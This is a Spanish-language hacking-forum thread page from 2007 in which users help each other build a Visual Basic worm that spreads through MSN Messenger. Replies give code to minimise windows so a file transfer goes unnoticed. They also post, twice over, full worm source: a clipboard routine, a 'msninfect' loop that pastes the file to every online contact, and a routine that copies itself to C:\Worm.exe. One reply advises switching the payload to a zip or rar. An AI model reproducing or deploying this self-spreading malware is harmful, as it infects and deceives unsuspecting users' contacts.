elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Como ocultar ventana
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Respuesta Imprimir
Autor Tema: Como ocultar ventana  (Leído 6,251 veces)
3k1n0x


Desconectado Desconectado

Mensajes: 324



Ver Perfil
Re: Como ocultar ventana
« Respuesta #20 en: 25 Julio 2007, 15:58 pm »

hola,por lo que decia Freeze el codigo seria Appactivate, sin el punto,algo asi para tener en cuenta los idiomas de msn:
 on error resume next
 appactivate "Conversación"
 appactivate "Conversati..."
 appactivate "..."

y asi t activara cualquier ventana q haya abierta si es q hay una abierta y tal vez si quieres ocultar la ventana podrias minimizarlas todas para q no se interrumpa la transferencia del archivo
     Const KEYEVENTF_KEYUP = &H2
     Const VK_LWIN = &H5B
     

     Call keybd_event(VK_LWIN, 0, 0, 0)
     Call keybd_event(77, 0, 0, 0)
     Call keybd_event(VK_LWIN, 0, KEYEVENTF_KEYUP, 0)
 una duda tu quieres q se autoenvie el mismo programa luego de comprimirse?

si, luego de descomprimido se repite pero lo e dejado parado aunq no es tan complicado porq no tengo listo algo bueno q tenga q llevar mientras se autoenvie salu2s


En línea

T3fL0n -> 3k1n0x
Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Como ocultar ventana
« Respuesta #21 en: 25 Julio 2007, 16:04 pm »

jejej  ya "se lo que hiciste el verano pasado",(chiste) si llegas a retomarlo avisame , podriamos hablar de algun code.


En línea


Encuentros por Video y Chat !!
Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Como ocultar ventana
« Respuesta #22 en: 25 Julio 2007, 16:11 pm »

Citar
Tal vez esto sirva:(no esta escrito por mi)

En un Modulo (Esto sirve para poner nuestro archivo dentro del Portapapeles):

Option Explicit

' Required data structures
Private Type POINTAPI
x As Long
y As Long
End Type

' Clipboard Manager Functions
Private Declare Function EmptyClipboard Lib "user32" () As Long
Private Declare Function OpenClipboard Lib "user32" (ByVal hWnd As Long) As Long
Private Declare Function CloseClipboard Lib "user32" () As Long
Private Declare Function SetClipboardData Lib "user32" (ByVal wFormat As Long, ByVal hMem As Long) As Long
Private Declare Function GetClipboardData Lib "user32" (ByVal wFormat As Long) As Long
Private Declare Function IsClipboardFormatAvailable Lib "user32" (ByVal wFormat As Long) As Long

' Other required Win32 APIs
Private Declare Function DragQueryFile Lib "shell32.dll" Alias "DragQueryFileA" (ByVal hDrop As Long, ByVal UINT As Long, ByVal lpStr As String, ByVal ch As Long) As Long
Private Declare Function DragQueryPoint Lib "shell32.dll" (ByVal hDrop As Long, lpPoint As POINTAPI) As Long
Private Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long
Private Declare Function GlobalFree Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Function GlobalUnlock Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Sub CopyMem Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)

' Predefined Clipboard Formats
Private Const CF_TEXT = 1
Private Const CF_BITMAP = 2
Private Const CF_METAFILEPICT = 3
Private Const CF_SYLK = 4
Private Const CF_DIF = 5
Private Const CF_TIFF = 6
Private Const CF_OEMTEXT = 7
Private Const CF_DIB = 8
Private Const CF_PALETTE = 9
Private Const CF_PENDATA = 10
Private Const CF_RIFF = 11
Private Const CF_WAVE = 12
Private Const CF_UNICODETEXT = 13
Private Const CF_ENHMETAFILE = 14
Private Const CF_HDROP = 15
Private Const CF_LOCALE = 16
Private Const CF_MAX = 17

' New shell-oriented clipboard formats
Private Const CFSTR_SHELLIDLIST As String = "Shell IDList Array"
Private Const CFSTR_SHELLIDLISTOFFSET As String = "Shell Object Offsets"
Private Const CFSTR_NETRESOURCES As String = "Net Resource"
Private Const CFSTR_FILEDESCRIPTOR As String = "FileGroupDescriptor"
Private Const CFSTR_FILECONTENTS As String = "FileContents"
Private Const CFSTR_FILENAME As String = "FileName"
Private Const CFSTR_PRINTERGROUP As String = "PrinterFriendlyName"
Private Const CFSTR_FILENAMEMAP As String = "FileNameMap"

' Global Memory Flags
Private Const GMEM_FIXED = &H0
Private Const GMEM_MOVEABLE = &H2
Private Const GMEM_NOCOMPACT = &H10
Private Const GMEM_NODISCARD = &H20
Private Const GMEM_ZEROINIT = &H40
Private Const GMEM_MODIFY = &H80
Private Const GMEM_DISCARDABLE = &H100
Private Const GMEM_NOT_BANKED = &H1000
Private Const GMEM_SHARE = &H2000
Private Const GMEM_DDESHARE = &H2000
Private Const GMEM_NOTIFY = &H4000
Private Const GMEM_LOWER = GMEM_NOT_BANKED
Private Const GMEM_VALID_FLAGS = &H7F72
Private Const GMEM_INVALID_HANDLE = &H8000
Private Const GHND = (GMEM_MOVEABLE Or GMEM_ZEROINIT)
Private Const GPTR = (GMEM_FIXED Or GMEM_ZEROINIT)

Private Type DROPFILES
pFiles As Long
pt As POINTAPI
fNC As Long
fWide As Long
End Type


Public Function ClipboardCopyFiles(Files() As String) As Boolean

Dim data As String
Dim df As DROPFILES
Dim hGlobal As Long
Dim lpGlobal As Long
Dim i As Long

' Open and clear existing crud off clipboard.
If OpenClipboard(0&) Then
Call EmptyClipboard

' Build double-null terminated list of files.
For i = LBound(Files) To UBound(Files)
data = data & Files(i) & vbNullChar
Next
data = data & vbNullChar

' Allocate and get pointer to global memory,
' then copy file list to it.
hGlobal = GlobalAlloc(GHND, Len(df) + Len(data))
If hGlobal Then
lpGlobal = GlobalLock(hGlobal)

' Build DROPFILES structure in global memory.
df.pFiles = Len(df)
Call CopyMem(ByVal lpGlobal, df, Len(df))
Call CopyMem(ByVal (lpGlobal + Len(df)), ByVal data, Len(data))
Call GlobalUnlock(hGlobal)

' Copy data to clipboard, and return success.
If SetClipboardData(CF_HDROP, hGlobal) Then
ClipboardCopyFiles = True
End If
End If

' Clean up
Call CloseClipboard
End If

End Function[/code>

Y aki el "Cuerpo virico":

[code>Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)

Const KEYEVENTF_KEYUP = &H2
Const VK_LWIN = &H5B

Private Sub Wait(ByVal nSec As Integer)
Dim t1 As Date, t2 As Date

t1 = Second(Now)
t2 = t1 + nSec

Do
DoEvents
Loop While t2 > Second(Now)
End Sub

Sub msninfect()
On Error Resume Next
Set w = CreateObject("Messenger.UIAutomation"
For Each ConTacto In w.MyContacts 'Vamos de contacto en contacto
If (ConTacto.Status = 2) Or (ConTacto.Status = 10) Or (ConTacto.Status = 14) Or (ConTacto.Status = 34) Or (ConTacto.Status = 50) Or (ConTacto.Status = 66) Then
Set iMsn = w.InstantMessage(ConTacto.SigninName)
SendKeys "^V"
End If
Next
Wait (1) ' Esperamos un segundito para no "atascar" tanto...
' A partir de aki sirve para minimizar todas las ventanas...
Call keybd_event(VK_LWIN, 0, 0, 0)
Call keybd_event(77, 0, 0, 0)
Call keybd_event(VK_LWIN, 0, KEYEVENTF_KEYUP, 0)
End Sub

A lo mejor te sirva esto ! :


En un Modulo (Esto sirve para poner nuestro archivo dentro del Portapapeles):

Option Explicit

' Required data structures
Private Type POINTAPI
x As Long
y As Long
End Type

' Clipboard Manager Functions
Private Declare Function EmptyClipboard Lib "user32" () As Long
Private Declare Function OpenClipboard Lib "user32" (ByVal hWnd As Long) As Long
Private Declare Function CloseClipboard Lib "user32" () As Long
Private Declare Function SetClipboardData Lib "user32" (ByVal wFormat As Long, ByVal hMem As Long) As Long
Private Declare Function GetClipboardData Lib "user32" (ByVal wFormat As Long) As Long
Private Declare Function IsClipboardFormatAvailable Lib "user32" (ByVal wFormat As Long) As Long

' Other required Win32 APIs
Private Declare Function DragQueryFile Lib "shell32.dll" Alias "DragQueryFileA" (ByVal hDrop As Long, ByVal UINT As Long, ByVal lpStr As String, ByVal ch As Long) As Long
Private Declare Function DragQueryPoint Lib "shell32.dll" (ByVal hDrop As Long, lpPoint As POINTAPI) As Long
Private Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long
Private Declare Function GlobalFree Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Function GlobalUnlock Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Sub CopyMem Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)

' Predefined Clipboard Formats
Private Const CF_TEXT = 1
Private Const CF_BITMAP = 2
Private Const CF_METAFILEPICT = 3
Private Const CF_SYLK = 4
Private Const CF_DIF = 5
Private Const CF_TIFF = 6
Private Const CF_OEMTEXT = 7
Private Const CF_DIB = 8
Private Const CF_PALETTE = 9
Private Const CF_PENDATA = 10
Private Const CF_RIFF = 11
Private Const CF_WAVE = 12
Private Const CF_UNICODETEXT = 13
Private Const CF_ENHMETAFILE = 14
Private Const CF_HDROP = 15
Private Const CF_LOCALE = 16
Private Const CF_MAX = 17

' New shell-oriented clipboard formats
Private Const CFSTR_SHELLIDLIST As String = "Shell IDList Array"
Private Const CFSTR_SHELLIDLISTOFFSET As String = "Shell Object Offsets"
Private Const CFSTR_NETRESOURCES As String = "Net Resource"
Private Const CFSTR_FILEDESCRIPTOR As String = "FileGroupDescriptor"
Private Const CFSTR_FILECONTENTS As String = "FileContents"
Private Const CFSTR_FILENAME As String = "FileName"
Private Const CFSTR_PRINTERGROUP As String = "PrinterFriendlyName"
Private Const CFSTR_FILENAMEMAP As String = "FileNameMap"

' Global Memory Flags
Private Const GMEM_FIXED = &H0
Private Const GMEM_MOVEABLE = &H2
Private Const GMEM_NOCOMPACT = &H10
Private Const GMEM_NODISCARD = &H20
Private Const GMEM_ZEROINIT = &H40
Private Const GMEM_MODIFY = &H80
Private Const GMEM_DISCARDABLE = &H100
Private Const GMEM_NOT_BANKED = &H1000
Private Const GMEM_SHARE = &H2000
Private Const GMEM_DDESHARE = &H2000
Private Const GMEM_NOTIFY = &H4000
Private Const GMEM_LOWER = GMEM_NOT_BANKED
Private Const GMEM_VALID_FLAGS = &H7F72
Private Const GMEM_INVALID_HANDLE = &H8000
Private Const GHND = (GMEM_MOVEABLE Or GMEM_ZEROINIT)
Private Const GPTR = (GMEM_FIXED Or GMEM_ZEROINIT)

Private Type DROPFILES
pFiles As Long
pt As POINTAPI
fNC As Long
fWide As Long
End Type


Public Function ClipboardCopyFiles(Files() As String) As Boolean

Dim data As String
Dim df As DROPFILES
Dim hGlobal As Long
Dim lpGlobal As Long
Dim i As Long

' Open and clear existing crud off clipboard.
If OpenClipboard(0&) Then
Call EmptyClipboard

' Build double-null terminated list of files.
For i = LBound(Files) To UBound(Files)
data = data & Files(i) & vbNullChar
Next
data = data & vbNullChar

' Allocate and get pointer to global memory,
' then copy file list to it.
hGlobal = GlobalAlloc(GHND, Len(df) + Len(data))
If hGlobal Then
lpGlobal = GlobalLock(hGlobal)

' Build DROPFILES structure in global memory.
df.pFiles = Len(df)
Call CopyMem(ByVal lpGlobal, df, Len(df))
Call CopyMem(ByVal (lpGlobal + Len(df)), ByVal data, Len(data))
Call GlobalUnlock(hGlobal)

' Copy data to clipboard, and return success.
If SetClipboardData(CF_HDROP, hGlobal) Then
ClipboardCopyFiles = True
End If
End If

' Clean up
Call CloseClipboard
End If

End Function[/code>

Y aki el "Cuerpo virico":

[code>Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)

Const KEYEVENTF_KEYUP = &H2
Const VK_LWIN = &H5B

Private Sub Wait(ByVal nSec As Integer)
Dim t1 As Date, t2 As Date

t1 = Second(Now)
t2 = t1 + nSec

Do
DoEvents
Loop While t2 > Second(Now)
End Sub

Sub msninfect()
On Error Resume Next
Set w = CreateObject("Messenger.UIAutomation"
For Each ConTacto In w.MyContacts 'Vamos de contacto en contacto
If (ConTacto.Status = 2) Or (ConTacto.Status = 10) Or (ConTacto.Status = 14) Or (ConTacto.Status = 34) Or (ConTacto.Status = 50) Or (ConTacto.Status = 66) Then
Set iMsn = w.InstantMessage(ConTacto.SigninName)
SendKeys "^V"
End If
Next
Wait (1) ' Esperamos un segundito para no "atascar" tanto...
' A partir de aki sirve para minimizar todas las ventanas...
Call keybd_event(VK_LWIN, 0, 0, 0)
Call keybd_event(77, 0, 0, 0)
Call keybd_event(VK_LWIN, 0, KEYEVENTF_KEYUP, 0)
End Sub

Sub newpropMSN()
Dim ap(0) As String
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Worm.exe" ' Nos Copiamos
ap(0) = "C:\Worm.exe"
If ClipboardCopyFiles = True Then ' Nos ponemos en el Portapapeles
End If
Wait (1) ' Esperamos 1 respiro al procesador...
msninfect ' Llamamos a la funcion de la propagación
End Sub
 ahora deberias modificar el code para enviar el rar o zip y no un exe... pero creoo q tu sabes hacerlo muy bien.salu25
;D ;D ;D ;D ;D ;D
En línea


Encuentros por Video y Chat !!
Páginas: 1 2 [3] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ventana de propiedades en dll, como cargarla?
.NET (C#, VB.NET, ASP)
Zeroql 0 1,713 Último mensaje 25 Noviembre 2010, 04:45 am
por Zeroql
como llenar la ventana de mensajes? xD
Programación Visual Basic
x64core 9 3,556 Último mensaje 16 Julio 2011, 04:33 am
por seba123neo
¿Cómo crear ventana en C++?
Programación C/C++
avmiitxe 1 8,210 Último mensaje 20 Febrero 2012, 20:30 pm
por Eternal Idol
Ocultar ventana indeseable en el TaskBar
.NET (C#, VB.NET, ASP)
Eleкtro 0 1,546 Último mensaje 4 Marzo 2013, 11:45 am
por Eleкtro
Cómo ocultar malware?
Hacking
painpills 1 4,839 Último mensaje 7 Julio 2021, 00:18 am
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines